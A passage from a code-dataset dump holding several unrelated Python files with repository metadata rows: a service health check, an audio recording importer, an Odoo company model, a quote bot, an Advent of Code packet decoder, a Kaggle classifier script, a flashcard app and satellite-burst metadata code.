recover.redis()
try:
r = Redis()
r.set("test_redis", "test")
r.get("test_redis")
r.delete("test_redis")
except:
recover.redis()
def test_workers(self):
"""Check rq workers are up.
"""
pids = self.get_process_pid("python3 worker")
workers = len(pids)
if workers < 5:
for i in range(1, 6):
pid = self.get_process_pid(f"python3 worker{i}")
if not pid:
recover.worker(i)
def test_schedule(self):
"""Check rq schedule is up.
"""
pid = self.get_process_pid("rqscheduler")
if not pid:
recover.scheduler()
if __name__ == "__main__":
health = Health()
health.test_zeroci_server()
health.test_redis()
health.test_workers()
health.test_schedule()
| 25.606061
| 76
| 0.562722
| 1,334
| 0.789349
| 0
| 0
| 0
| 0
| 0
| 0
| 410
| 0.242604
|
5570f5a350941f5510b456b02cd8353c974ae345
| 13,284
|
py
|
Python
|
vesper/command/recording_importer.py
|
RichardLitt/Vesper
|
5360844f42a06942e7684121c650b08cf8616285
|
[
"MIT"
] | null | null | null |
vesper/command/recording_importer.py
|
RichardLitt/Vesper
|
5360844f42a06942e7684121c650b08cf8616285
|
[
"MIT"
] | null | null | null |
vesper/command/recording_importer.py
|
RichardLitt/Vesper
|
5360844f42a06942e7684121c650b08cf8616285
|
[
"MIT"
] | null | null | null |
"""Module containing class `RecordingImporter`."""
from pathlib import Path
import itertools
import logging
import os
from django.db import transaction
from vesper.command.command import CommandExecutionError
from vesper.django.app.models import (
DeviceConnection, Job, Recording, RecordingChannel, RecordingFile)
from vesper.singletons import recording_manager
import vesper.command.command_utils as command_utils
import vesper.command.recording_utils as recording_utils
import vesper.util.audio_file_utils as audio_file_utils
import vesper.util.signal_utils as signal_utils
import vesper.util.time_utils as time_utils
class RecordingImporter:
"""
Importer for recordings already stored in files on the Vesper server.
The recordings to be imported are specified in the `paths` argument
as server-side directory and file paths. Files from directories can
be imported either recursively or non-recursively according to the
`recursive` argument. The import does not copy or move recordings:
it stores the existing paths of their files for future reference.
The importer obtains recording metadata for imported files with the
aid of a recording file parser extension, specified by the
`recording_file_parser` argument.
"""
extension_name = 'Recording Importer'
def __init__(self, args):
self.paths = command_utils.get_required_arg('paths', args)
self.recursive = command_utils.get_optional_arg(
'recursive', args, True)
spec = command_utils.get_optional_arg('recording_file_parser', args)
self.file_parser = recording_utils.create_recording_file_parser(spec)
def execute(self, job_info):
self._job = Job.objects.get(id=job_info.job_id)
self._logger = logging.getLogger()
try:
recordings = self._get_recordings()
new_recordings, old_recordings = \
self._partition_recordings(recordings)
self._log_header(new_recordings, old_recordings)
with transaction.atomic():
self._import_recordings(new_recordings)
except Exception as e:
self._logger.error((
'Recording import failed with an exception.\n'
'The exception message was:\n'
' {}\n'
'The archive was not modified.\n'
'See below for exception traceback.').format(str(e)))
raise
else:
self._log_imports(new_recordings)
return True
def _get_recordings(self):
files = list(itertools.chain.from_iterable(
self._get_path_recording_files(path) for path in self.paths))
return recording_utils.group_recording_files(files)
def _get_path_recording_files(self, path):
if os.path.isdir(path):
return self._get_dir_recording_files(path)
else:
file = self._get_recording_file(path)
return [] if file is None else [file]
def _get_dir_recording_files(self, path):
files = []
for (dir_path, dir_names, file_names) in os.walk(path):
for file_name in file_names:
file_path = os.path.join(dir_path, file_name)
file = self._get_recording_file(Path(file_path))
if file is not None:
files.append(file)
if not self.recursive:
# Stop `os.walk` from descending into subdirectories.
del dir_names[:]
return files
def _get_recording_file(self, file_path):
if not audio_file_utils.is_wave_file_path(file_path):
return None
else:
rel_path, abs_path = self._get_recording_file_paths(file_path)
file = self._parse_recording_file(abs_path)
file.path = rel_path
_set_recording_file_channel_info(file)
return file
def _get_recording_file_paths(self, file_path):
if file_path.is_absolute():
if not file_path.exists():
raise CommandExecutionError(
'Purported recording file "{}" does not exist.')
rel_path = self._get_relative_path(file_path)
return rel_path, file_path
else:
# path is relative
abs_path = self._get_absolute_path(file_path)
return file_path, abs_path
def _get_relative_path(self, file_path):
manager = recording_manager.instance
try:
_, rel_path = manager.get_relative_recording_file_path(file_path)
except ValueError:
self._handle_bad_recording_file_path(
file_path, 'is not in', manager)
return rel_path
def _handle_bad_recording_file_path(self, file_path, condition, manager):
dir_paths = manager.recording_dir_paths
if len(dir_paths) == 1:
s = 'the recording directory "{}"'.format(dir_paths[0])
else:
path_list = str(list(dir_paths))
s = 'any of the recording directories {}'.format(path_list)
raise CommandExecutionError(
'Recording file "{}" {} {}.'.format(file_path, condition, s))
def _get_absolute_path(self, file_path):
manager = recording_manager.instance
try:
return manager.get_absolute_recording_file_path(file_path)
except ValueError:
self._handle_bad_recording_file_path(
file_path, 'could not be found in', manager)
def _parse_recording_file(self, file_path):
try:
file = self.file_parser.parse_file(str(file_path))
except ValueError as e:
raise CommandExecutionError(
'Error parsing recording file "{}": {}'.format(
file_path, str(e)))
if file.recorder is None:
file.recorder = _get_recorder(file)
return file
def _partition_recordings(self, recordings):
new_recordings = []
old_recordings = []
for r in recordings:
if self._recording_exists(r):
old_recordings.append(r)
else:
new_recordings.append(r)
return (new_recordings, old_recordings)
def _recording_exists(self, recording):
try:
Recording.objects.get(
station=recording.station,
recorder=recording.recorder,
start_time=recording.start_time)
except Recording.DoesNotExist:
return False
else:
return True
def _log_header(self, new_recordings, old_recordings):
log = self._logger.info
new_count = len(new_recordings)
old_count = len(old_recordings)
if new_count == 0 and old_count == 0:
log('Found no recordings at the specified paths.')
else:
new_text = self._get_num_recordings_text(new_count, 'new')
old_text = self._get_num_recordings_text(old_count, 'old')
log('Found {} and {} at the specified paths.'.format(
new_text, old_text))
if len(new_recordings) == 0:
log('No recordings will be imported.')
else:
log('The new recordings will be imported.')
def _get_num_recordings_text(self, count, description):
suffix = '' if count == 1 else 's'
return '{} {} recording{}'.format(count, description, suffix)
def _import_recordings(self, recordings):
for r in recordings:
end_time = signal_utils.get_end_time(
r.start_time, r.length, r.sample_rate)
creation_time = time_utils.get_utc_now()
recording = Recording(
station=r.station,
recorder=r.recorder,
num_channels=r.num_channels,
length=r.length,
sample_rate=r.sample_rate,
start_time=r.start_time,
end_time=end_time,
creation_time=creation_time,
creating_job=self._job)
recording.save()
r.model = recording
for channel_num in range(r.num_channels):
recorder_channel_num = r.recorder_channel_nums[channel_num]
mic_output = r.mic_outputs[channel_num]
channel = RecordingChannel(
recording=recording,
channel_num=channel_num,
recorder_channel_num=recorder_channel_num,
mic_output=mic_output)
channel.save()
start_index = 0
for file_num, f in enumerate(r.files):
# We store all paths in the archive database as POSIX
# paths, even on Windows, for portability, since Python's
# `pathlib` module recognizes the slash as a path separator
# on all platforms, but not the backslash.
path = f.path.as_posix()
file = RecordingFile(
recording=recording,
file_num=file_num,
start_index=start_index,
length=f.length,
path=path)
file.save()
start_index += f.length
def _log_imports(self, recordings):
for r in recordings:
log = self._logger.info
log('Imported recording {} with files:'.format(str(r.model)))
for f in r.files:
log(' {}'.format(f.path.as_posix()))
def _get_recorder(file):
end_time = signal_utils.get_end_time(
file.start_time, file.length, file.sample_rate)
station_recorders = file.station.get_station_devices(
'Audio Recorder', file.start_time, end_time)
if len(station_recorders) == 0:
raise CommandExecutionError(
'Could not find recorder for recording file "{}".'.format(
file.path))
elif len(station_recorders) > 1:
raise CommandExecutionError(
'Found more than one possible recorder for file "{}".'.format(
file.path))
else:
return station_recorders[0].device
def _set_recording_file_channel_info(file):
mic_outputs = _get_recorder_mic_outputs(file.recorder, file.start_time)
if file.recorder_channel_nums is None:
# file name did not indicate recorder channel numbers
if len(mic_outputs) != file.num_channels:
# number of connected mic outputs does not match number
# of file channels
raise CommandExecutionError((
'Could not infer recorder channel numbers for '
'recording file "{}".').format(file.path))
else:
# number of connected mic outputs matches number of file
# channels
# We assume that recorder inputs map to file channel numbers
# in increasing order.
file.recorder_channel_nums = tuple(sorted(mic_outputs.keys()))
file.mic_outputs = tuple(
_get_mic_output(mic_outputs, i, file.path)
for i in file.recorder_channel_nums)
def _get_recorder_mic_outputs(recorder, time):
"""
Gets a mapping from recorder input channel numbers to connected
microphone outputs for the specified recorder and time.
"""
connections = DeviceConnection.objects.filter(
input__device=recorder,
output__device__model__type='Microphone',
start_time__lte=time,
end_time__gt=time)
# print('recording_importer.get_recorder_mic_outputs', connections.query)
return dict((c.input.channel_num, c.output) for c in connections)
def _get_mic_output(mic_outputs, channel_num, file_path):
try:
return mic_outputs[channel_num]
except KeyError:
raise CommandExecutionError((
'Could not find microphone output connected to recorder input '
'{} for recording file "{}".').format(channel_num, file_path))
| 32.479218
| 77
| 0.564664
| 10,033
| 0.755269
| 0
| 0
| 0
| 0
| 0
| 0
| 2,400
| 0.180668
|
557658851f4a3ae8f5f44ddef879cff02f03ad5f
| 1,096
|
py
|
Python
|
l10n_ar_ux/models/res_company.py
|
odoo-mastercore/odoo-argentina
|
58cdfe8610bae42f69ddb9d652a28eb3245f6a04
|
[
"MIT"
] | 1
|
2021-01-25T15:57:58.000Z
|
2021-01-25T15:57:58.000Z
|
l10n_ar_ux/models/res_company.py
|
odoo-mastercore/odoo-argentina
|
58cdfe8610bae42f69ddb9d652a28eb3245f6a04
|
[
"MIT"
] | null | null | null |
l10n_ar_ux/models/res_company.py
|
odoo-mastercore/odoo-argentina
|
58cdfe8610bae42f69ddb9d652a28eb3245f6a04
|
[
"MIT"
] | 2
|
2020-10-17T16:36:02.000Z
|
2021-01-24T10:20:05.000Z
|
##############################################################################
# For copyright and license notices, see __manifest__.py file in module root
# directory
##############################################################################
from odoo import fields, models
class ResCompany(models.Model):
_inherit = "res.company"
gross_income_jurisdiction_ids = fields.Many2many(
related='partner_id.gross_income_jurisdiction_ids',
readonly=False,
)
# TODO this field could be defined directly on l10n_ar_account_withholding
arba_cit = fields.Char(
'CIT ARBA',
help='Clave de Identificación Tributaria de ARBA',
)
    # the activities start date may differ for each point of sale,
    # so we expose it as a related field on the partner
l10n_ar_afip_start_date = fields.Date(
related='partner_id.start_date', string='Activities Start',
readonly=False)
l10n_ar_report_signature = fields.Image('Firma', copy=False, attachment=True)
l10n_ar_report_signed_by = fields.Text('Aclaracion', copy=False)
| 39.142857
| 81
| 0.620438
| 815
| 0.742935
| 0
| 0
| 0
| 0
| 0
| 0
| 606
| 0.552416
|
5576c4dbc04cfe8f5be4007143719bb7a25f5574
| 2,033
|
py
|
Python
|
Quotebot/utils.py
|
musawakiliML/Whatsapp-Bots
|
29fe6c645010ddedac1424b22c842b3e61511644
|
[
"MIT"
] | null | null | null |
Quotebot/utils.py
|
musawakiliML/Whatsapp-Bots
|
29fe6c645010ddedac1424b22c842b3e61511644
|
[
"MIT"
] | null | null | null |
Quotebot/utils.py
|
musawakiliML/Whatsapp-Bots
|
29fe6c645010ddedac1424b22c842b3e61511644
|
[
"MIT"
] | null | null | null |
import requests
def random_quote(type=''):
'''A function to get random quotes'''
if type == "today":
response_quote = requests.get("https://zenquotes.io/api/today/ff5e73b15a05ca51951b758bd7943ce803d71772")
if response_quote.status_code == 200:
quote_data = response_quote.json()
quote = quote_data[0]['q']
quote_author = quote_data[0]['a']
quote_message = f"'{quote_author.title()}' Said:{quote}"
return quote_message
else:
return f"Invalid Request {response_quote.status_code}"
elif type == "quote":
response_quote = requests.get("https://zenquotes.io/api/random/ff5e73b15a05ca51951b758bd7943ce803d71772")
if response_quote.status_code == 200:
quote_data = response_quote.json()
quote = quote_data[0]['q']
quote_author = quote_data[0]['a']
quote_message = f"'{quote_author.title()}' Said:{quote}"
return quote_message
else:
return f"Invalid Request {response_quote.status_code}"
else:
return f"Invalid Request!"
def jokes():
'''This function gets a joke'''
response_joke = requests.get("https://some-random-api.ml/joke")
if response_joke.status_code == 200:
joke = response_joke.json()
return joke['joke']
else:
return f"Invalid Request {response_joke.status_code}"
def cat_dog(input_message):
if "cat" in input_message and "gif" in input_message:
response_gif = requests.get("https://cataas.com/cat")
cat_gif = response_gif.url
return cat_gif
elif "cat" in input_message:
response_cat = requests.get("https://cataas.com/cat/cute")
cat = response_cat.url
return cat
elif "dog" in input_message:
response_dog = requests.get("https://dog.ceo/api/breeds/image/random")
dog_data = response_dog.json()['message']
return dog_data
else:
return "Invalid Request!"
| 31.765625
| 113
| 0.624693
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 662
| 0.325627
|
557a41cb5f2fe81007b03e1796d482334c493ead
| 3,401
|
py
|
Python
|
src/day16.py
|
dcbriccetti/advent-of-code-2021-python
|
65958fb256234cf882714d3c3306cdbf60bcc0ae
|
[
"Unlicense"
] | 4
|
2021-12-10T22:47:56.000Z
|
2021-12-26T21:35:58.000Z
|
src/day16.py
|
dcbriccetti/advent-of-code-2021-python
|
65958fb256234cf882714d3c3306cdbf60bcc0ae
|
[
"Unlicense"
] | null | null | null |
src/day16.py
|
dcbriccetti/advent-of-code-2021-python
|
65958fb256234cf882714d3c3306cdbf60bcc0ae
|
[
"Unlicense"
] | null | null | null |
from math import prod
from pathlib import Path
class BitStream:
'Deliver integers from a stream of bits created from a hexadecimal string'
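    # Illustrative example: BitStream('D2FE28') yields the bit string
    # 110100101111111000101000, so next_int(3) returns 0b110 == 6.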
bit_str: str
pos: int
def __init__(self, hex_nibbles_str: str) -> None:
def binary_nibble_str(hex_nibble_str: str) -> str:
'Convert, for example, `e` ➜ `1110`, or `0` ➜ `0000`'
nibble = int(hex_nibble_str, 16)
bits_str = bin(nibble)[2:] # Removes the 0b at the left
padding_needed = 4 - len(bits_str)
return '0' * padding_needed + bits_str
self.bit_str = ''.join(binary_nibble_str(hex_nibble_str)
for hex_nibble_str in hex_nibbles_str)
self.pos = 0
def next_int(self, num_bits: int) -> int:
'Get the next `num_bits` bits and return them parsed as a binary number'
return int(self._next_str(num_bits), 2)
def _next_str(self, num_bits) -> str:
'Return the next `num_bits` bits as a string'
bits_str = self.bit_str[:num_bits]
self.bit_str = self.bit_str[num_bits:]
self.pos += num_bits
return bits_str
class Decoder:
'Decode the BITS packet and its nested contained packets'
bits: BitStream
versions_sum: int
operators = [
sum, prod, min, max, None,
lambda vals: int(vals[0] > vals[1]),
lambda vals: int(vals[0] < vals[1]),
lambda vals: int(vals[0] == vals[1]),
]
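    # The index into `operators` is the packet type ID; type 4 is a literal and
    # has no operator. For example, Decoder('D2FE28').parse() returns the
    # literal value 2021 and leaves versions_sum == 6.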
def __init__(self, packet_hex):
self.bits = BitStream(packet_hex)
print(f'Decoder started for {len(self.bits.bit_str)} bits {packet_hex} {self.bits.bit_str}')
self.versions_sum = 0
def parse(self, level=0) -> int:
def parse_literal() -> int:
value = 0
more: bool = True
while more:
more = bool(next_int(1))
nibble: int = next_int(4)
value = (value << 4) + nibble # Slide over and drop in new bits
print(f'{value=}')
return value
def parse_operator(type: int) -> int:
def parse_subpackets_by_length(packets_length) -> list[int]:
values: list[int] = []
print(f'{packets_length=}')
stop_pos = self.bits.pos + packets_length
while self.bits.pos < stop_pos:
values.append(self.parse(level + 1))
return values
def parse_subpackets_by_count(packet_count) -> list[int]:
print(f'{packet_count=}')
return [self.parse(level + 1) for _ in range(packet_count)]
subpacket_parsers = [parse_subpackets_by_length, parse_subpackets_by_count]
length_type_id = next_int(1)
length_or_count = next_int(15 if length_type_id == 0 else 11)
values = subpacket_parsers[length_type_id](length_or_count)
return Decoder.operators[type](values)
next_int = self.bits.next_int
indent = ' ' * level
ver = next_int(3)
self.versions_sum += ver
type = next_int(3)
print(indent + f'{ver=}, {type=}, ', end='')
return parse_literal() if type == 4 else parse_operator(type)
if __name__ == '__main__':
decoder = Decoder(Path('../data/16.txt').read_text().strip())
print(f'Result: {decoder.parse()}, versions sum: {decoder.versions_sum}')
| 36.180851
| 100
| 0.586004
| 3,182
| 0.934508
| 0
| 0
| 0
| 0
| 0
| 0
| 623
| 0.182966
|
557ac6c635a14924685b462c2a901a11408e15a1
| 6,328
|
py
|
Python
|
Santander-spyder.py
|
Herikc2/Santander-Customer-Satisfaction
|
c868538ab06c252b2f9e51bac384b0f6e48efd70
|
[
"MIT"
] | null | null | null |
Santander-spyder.py
|
Herikc2/Santander-Customer-Satisfaction
|
c868538ab06c252b2f9e51bac384b0f6e48efd70
|
[
"MIT"
] | null | null | null |
Santander-spyder.py
|
Herikc2/Santander-Customer-Satisfaction
|
c868538ab06c252b2f9e51bac384b0f6e48efd70
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 3 17:13:15 2021
Database: https://www.kaggle.com/c/santander-customer-satisfaction
@author: Herikc Brecher
"""
# Import from libraries
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import train_test_split
from xgboost import XGBClassifier
import pandas as pd
from sklearn.preprocessing import Normalizer
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
import matplotlib.pyplot as plt
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
import seaborn as sns
import pickle
import warnings
warnings.filterwarnings("ignore")
# Loading the training dataset in CSV format
training_file = 'data/train.csv'
test_file = 'data/test.csv'
data_training = pd.read_csv(training_file)
test_data = pd.read_csv(test_file)
print(data_training.shape)
print(test_data.shape)
# Viewing the first 20 lines
data_training.head (20)
# Data type of each attribute
data_training.dtypes
# Statistical Summary
data_training.describe()
# Distribution of classes
data_training.groupby("TARGET").size()
# Dividing by class
data_class_0 = data_training[data_training['TARGET'] == 0]
data_class_1 = data_training[data_training['TARGET'] == 1]
counter_class_0 = data_class_0.shape[0]
counter_class_1 = data_class_1.shape[0]
# Downsample the majority class (0) to the size of the minority class (1)
data_class_0_sample = data_class_0.sample(counter_class_1)
training_data = pd.concat([data_class_0_sample, data_class_1], axis = 0)
# Pearson correlation
data_training.corr(method = 'pearson')
# Finding the correlation between the target variable and the predictor variables
corr = training_data[training_data.columns [1:]].corr()['TARGET'][:].abs()
minimal_correlation = 0.02
corr2 = corr[corr > minimal_correlation]
corr2.shape
corr2
corr_keys = corr2.index.tolist()
data_filter = data_training[corr_keys]
data_filter.head(20)
data_filter.dtypes
# Filtering only the columns that have a correlation above the minimum variable
array_treino = data_training[corr_keys].values
# Separating the array into input and output components for training data
X = array_treino[:, 0:array_treino.shape[1] - 1]
Y = array_treino[:, array_treino.shape[1] - 1]
# Creating the training and test dataset
test_size = 0.30
X_training, X_testing, Y_training, Y_testing = train_test_split(X, Y, test_size = test_size)
# Generating normalized data
scaler = Normalizer().fit(X_training)
normalizedX_treino = scaler.transform(X_training)
scaler = Normalizer().fit(X_testing)
normalizedX_teste = scaler.transform(X_testing)
Y_training = Y_training.astype('int')
Y_testing = Y_testing.astype('int')
'''
Execution of a series of classification algorithms is based on those that have the best result.
For this test, the training base is used without any treatment or data selection.
'''
# Setting the number of folds for cross validation
num_folds = 10
# Preparing the list of models
models = []
models.append(('LR', LogisticRegression()))
models.append(('LDA', LinearDiscriminantAnalysis()))
models.append(('NB', GaussianNB()))
models.append(('KNN', KNeighborsClassifier()))
models.append(('CART', DecisionTreeClassifier()))
models.append(('SVM', SVC()))
results = []
names = []
for name, model in models:
    kfold = KFold(n_splits = num_folds)
    cv_results = cross_val_score(model, X_training, Y_training, cv = kfold, scoring = 'accuracy')
    results.append(cv_results)
    names.append(name)
    msg = "%s: %f (%f)" % (name, cv_results.mean(), cv_results.std())
    print(msg)
# Boxplot to compare the algorithms
fig = plt.figure()
fig.suptitle('Comparison of Classification Algorithms')
ax = fig.add_subplot(111)
plt.boxplot(results)
ax.set_xticklabels(names)
plt.show()
# Function to evaluate the performance of the model and save it in a pickle format for future reuse.
def model_report(model_name):
# Print result
print("Accuracy:% .3f"% score)
# Making predictions and building the Confusion Matrix
predictions = result.predict(X_testing)
matrix = confusion_matrix(Y_testing, predictions)
print(matrix)
report = classification_report(Y_testing, predictions)
print(report)
# The precision matrix is created to visualize the number of correct cases
labels = ['SATISFIED', 'UNSATISFIED']
cm = confusion_matrix(Y_testing, predictions)
cm = pd.DataFrame(cm, index = ['0', '1'], columns = ['0', '1'])
    plt.figure(figsize = (10, 10))
sns.heatmap(cm, cmap = "Blues", linecolor = 'black', linewidth = 1, annot = True, fmt = '', xticklabels = labels, yticklabels = labels)
# Saving the model
file = 'models/final_classifier_model' + model_name + '.sav'
pickle.dump (model, open(file, 'wb'))
print("Saved Model!")
# Each model is fit on the training split and scored on the held-out test split.
# Logistic Regression
model = LogisticRegression()
result = model.fit(normalizedX_treino, Y_training)
score = result.score(normalizedX_teste, Y_testing)
model_report("LR")
# Linear Discriminant Analysis
model = LinearDiscriminantAnalysis()
result = model.fit(X_training, Y_training)
score = result.score(X_testing, Y_testing)
model_report("LDA")
# KNN
model = KNeighborsClassifier()
result = model.fit(normalizedX_treino, Y_training)
score = result.score(normalizedX_teste, Y_testing)
model_report("KNN")
# CART
model = DecisionTreeClassifier()
result = model.fit(X_training, Y_training)
score = result.score(X_testing, Y_testing)
model_report("CART")
# XGBOOST
model = XGBClassifier()
result = model.fit(X_training, Y_training)
score = result.score(X_testing, Y_testing)
model_report("XGBOOST")
# Loading the model
file = 'models/final_classifier_modelXGBOOST.sav'
model_classifier = pickle.load(open(file, 'rb'))
model_prod = model_classifier.score(X_testing, Y_testing)
print("Uploaded Model")
# Print Result
print("Accuracy:% .3f"% (model_prod.mean () * 100))
| 30.423077
| 140
| 0.733881
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,798
| 0.283955
|
557b0f82fa2e590f23c344cfc48bb3aef2ee423d
| 4,502
|
py
|
Python
|
Memorization Tool/task/tool.py
|
soukalli/jetbrain-accademy
|
fc486d439b4b54a58956e1186eb69c56b85f85f1
|
[
"MIT"
] | null | null | null |
Memorization Tool/task/tool.py
|
soukalli/jetbrain-accademy
|
fc486d439b4b54a58956e1186eb69c56b85f85f1
|
[
"MIT"
] | null | null | null |
Memorization Tool/task/tool.py
|
soukalli/jetbrain-accademy
|
fc486d439b4b54a58956e1186eb69c56b85f85f1
|
[
"MIT"
] | null | null | null |
# write your code here
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, String, Integer
from sqlalchemy.orm import sessionmaker
engine = create_engine('sqlite:///flashcard.db?check_same_thread=False')
Base = declarative_base()
Session = sessionmaker(bind=engine)
session = Session()
successor = {'A': 'B', 'B': 'C'}
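# Leitner-style promotion: a correct answer moves a card A -> B -> C, a correct
# answer in box C removes it, and a wrong answer sends it back to box A
# (see update_card_status below).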
class FlashCard(Base):
__tablename__ = 'flashcard'
id = Column(Integer, primary_key=True)
question = Column(String(255))
answer = Column(String(255))
box = Column(String(1))
Base.metadata.create_all(engine)
def print_main_menu():
print("1. Add flashcards")
print("2. Practice flashcards")
print("3. Exit")
def process_menu_1():
sub_menu_choice = ""
while sub_menu_choice != "2":
print("1. Add a new flashcard")
print("2. Exit")
sub_menu_choice = input()
if sub_menu_choice == "1":
print("Question:")
question = input()
while question.strip() == "":
print("Question:")
question = input()
print("Answer:")
answer = input()
while answer.strip() == "":
print("Answer:")
answer = input()
card = FlashCard(question=question, answer=answer, box='A')
session.add(card)
session.commit()
elif sub_menu_choice != "2":
print("{0} is not an option".format(sub_menu_choice))
def update_card_status(flashcard, is_success):
if not is_success:
flashcard.box = 'A'
else:
if flashcard.box == 'C':
session.delete(flashcard)
else:
flashcard.box = successor.get(flashcard.box)
session.commit()
def process_confirmation_flashcard(flashcard):
print("Answer: {}".format(flashcard.answer))
def process_answer_flashcard(flashcard):
print('press "y" if your answer is correct:')
print('press "n" if your answer is wrong:')
choice = ""
while choice != "y" and choice != "n":
choice = input()
if choice == "y" or choice == "n":
update_card_status(flashcard, choice == "y")
break
else:
print("{0} is not an option".format(choice))
def process_update_flashcard(flashcard):
print('press "d" to delete the flashcard:')
print('press "e" to edit the flashcard:')
choice = ""
while choice != "d" and choice != "e":
choice = input()
if choice == "e":
print("current question: {0}".format(flashcard.question))
question = input("please write a new question:\n")
flashcard.question = question
print("current answer: {0}".format(flashcard.answer))
answer = input("please write a new answer:\n")
flashcard.answer = answer
global session
session.commit()
break
elif choice == "d":
session.delete(flashcard)
break
else:
print("{0} is not an option".format(choice))
def process_flashcard(flashcard):
print("Question: {}".format(flashcard.question))
print('press "y" to see the answer:')
print('press "n" to skip:')
print('press "u" to update:')
sub_menu_choice = ""
while sub_menu_choice != "n":
sub_menu_choice = input()
if sub_menu_choice == "y":
process_confirmation_flashcard(flashcard)
process_answer_flashcard(flashcard)
break
elif sub_menu_choice == "n":
process_answer_flashcard(flashcard)
break
elif sub_menu_choice == "u":
process_update_flashcard(flashcard)
break
elif sub_menu_choice != "n":
print("{0} is not an option".format(sub_menu_choice))
def process_menu_2():
flashcards = session.query(FlashCard).all()
if len(flashcards) == 0:
print('There is no flashcard to practice!')
else:
for flashcard in flashcards:
process_flashcard(flashcard)
def process_main_menu(choice):
if choice == "1":
process_menu_1()
elif choice == "2":
process_menu_2()
elif choice != "3":
print("{} is not an option".format(choice))
def main_loop():
choice = ""
while choice != "3":
print_main_menu()
choice = input()
process_main_menu(choice)
print("Bye!")
main_loop()
| 28.675159
| 72
| 0.589294
| 194
| 0.043092
| 0
| 0
| 0
| 0
| 0
| 0
| 803
| 0.178365
|
557b20fb22a3ac884a03a5ffa7db1db58d06ea7c
| 9,862
|
py
|
Python
|
src/compass/utils/geo_metadata.py
|
vbrancat/COMPASS
|
285412ac2fc474e789e255dae16eba4485017c07
|
[
"Apache-2.0"
] | 11
|
2021-11-24T07:24:11.000Z
|
2022-03-23T16:40:13.000Z
|
src/compass/utils/geo_metadata.py
|
vbrancat/COMPASS
|
285412ac2fc474e789e255dae16eba4485017c07
|
[
"Apache-2.0"
] | 6
|
2021-12-15T16:45:58.000Z
|
2022-03-24T23:36:16.000Z
|
src/compass/utils/geo_metadata.py
|
LiangJYu/COMPASS
|
459f5d6cf05c2b7c9013f0d862bfef22af280fa6
|
[
"Apache-2.0"
] | 4
|
2021-12-07T19:45:26.000Z
|
2022-02-28T23:05:37.000Z
|
from dataclasses import dataclass
from datetime import datetime
import json
from types import SimpleNamespace
import isce3
from isce3.core import LUT2d, Poly1d, Orbit
from isce3.product import GeoGridParameters
import numpy as np
from ruamel.yaml import YAML
from shapely.geometry import Point, Polygon
from compass.utils.geo_runconfig import GeoRunConfig
from compass.utils.raster_polygon import get_boundary_polygon
from compass.utils.wrap_namespace import wrap_namespace, unwrap_to_dict
def _poly1d_from_dict(poly1d_dict) -> Poly1d:
return Poly1d(poly1d_dict['coeffs'], poly1d_dict['mean'],
poly1d_dict['std'])
def _lut2d_from_dict(lut2d_dict) -> LUT2d:
lut2d_shape = (lut2d_dict['length'], lut2d_dict['width'])
lut2d_data = np.array(lut2d_dict['data']).reshape(lut2d_shape)
return LUT2d(lut2d_dict['x_start'], lut2d_dict['y_start'],
lut2d_dict['x_spacing'], lut2d_dict['y_spacing'],
lut2d_data)
def _orbit_from_dict(orbit_dict) -> Orbit:
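    # Expected layout of `orbit_dict` (mirroring GeoCslcMetadata.as_dict below),
    # with illustrative values:
    #   {'ref_epoch': '<date-time string>',
    #    'time': {'first': 0.0, 'spacing': 10.0, 'last': ..., 'size': N},
    #    'position_x': [...], ..., 'velocity_z': [...]}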
ref_epoch = isce3.core.DateTime(orbit_dict['ref_epoch'])
# build state vector
dt = float(orbit_dict['time']['spacing'])
t0 = ref_epoch + isce3.core.TimeDelta(float(orbit_dict['time']['first']))
n_pts = int(orbit_dict['time']['size'])
orbit_sv = [[]] * n_pts
for i in range(n_pts):
t = t0 + isce3.core.TimeDelta(i * dt)
pos = [float(orbit_dict[f'position_{xyz}'][i]) for xyz in 'xyz']
vel = [float(orbit_dict[f'velocity_{xyz}'][i]) for xyz in 'xyz']
orbit_sv[i] = isce3.core.StateVector(t, pos, vel)
return Orbit(orbit_sv, ref_epoch)
@dataclass(frozen=True)
class GeoCslcMetadata():
# subset of burst class attributes
sensing_start: datetime
sensing_stop: datetime
radar_center_frequency: float
wavelength: float
azimuth_steer_rate: float
azimuth_time_interval: float
slant_range_time: float
starting_range: float
range_sampling_rate: float
range_pixel_spacing: float
azimuth_fm_rate: Poly1d
doppler: Poly1d
range_bandwidth: float
polarization: str # {VV, VH, HH, HV}
burst_id: str # t{track_number}_iw{1,2,3}_b{burst_index}
platform_id: str # S1{A,B}
center: Point # {center lon, center lat} in degrees
border: Polygon # list of lon, lat coordinate tuples (in degrees) representing burst border
orbit: isce3.core.Orbit
orbit_direction: str
# VRT params
tiff_path: str # path to measurement tiff in SAFE/zip
i_burst: int
# window parameters
range_window_type: str
range_window_coefficient: float
runconfig: SimpleNamespace
geogrid: GeoGridParameters
nodata: str
input_data_ipf_version: str
isce3_version: str
@classmethod
def from_georunconfig(cls, cfg: GeoRunConfig):
'''Create GeoBurstMetadata class from GeoRunConfig object
Parameter:
---------
cfg : GeoRunConfig
GeoRunConfig containing geocoded burst metadata
'''
burst = cfg.bursts[0]
burst_id = burst.burst_id
geogrid = cfg.geogrids[burst_id]
# get boundary from geocoded raster
burst_id = burst.burst_id
date_str = burst.sensing_start.strftime("%Y%m%d")
pol = burst.polarization
geo_raster_path = f'{cfg.output_dir}/{burst_id}_{date_str}_{pol}.slc'
geo_boundary = get_boundary_polygon(geo_raster_path, np.nan)
center = geo_boundary.centroid
# place holders
nodata_val = '?'
ipf_ver = '?'
isce3_ver = '?'
return cls(burst.sensing_start, burst.sensing_stop,
burst.radar_center_frequency, burst.wavelength,
burst.azimuth_steer_rate, burst.azimuth_time_interval,
burst.slant_range_time, burst.starting_range,
burst.range_sampling_rate, burst.range_pixel_spacing,
burst.azimuth_fm_rate, burst.doppler.poly1d,
burst.range_bandwidth, burst.polarization, burst_id,
burst.platform_id, center, geo_boundary, burst.orbit,
burst.orbit_direction, burst.tiff_path, burst.i_burst,
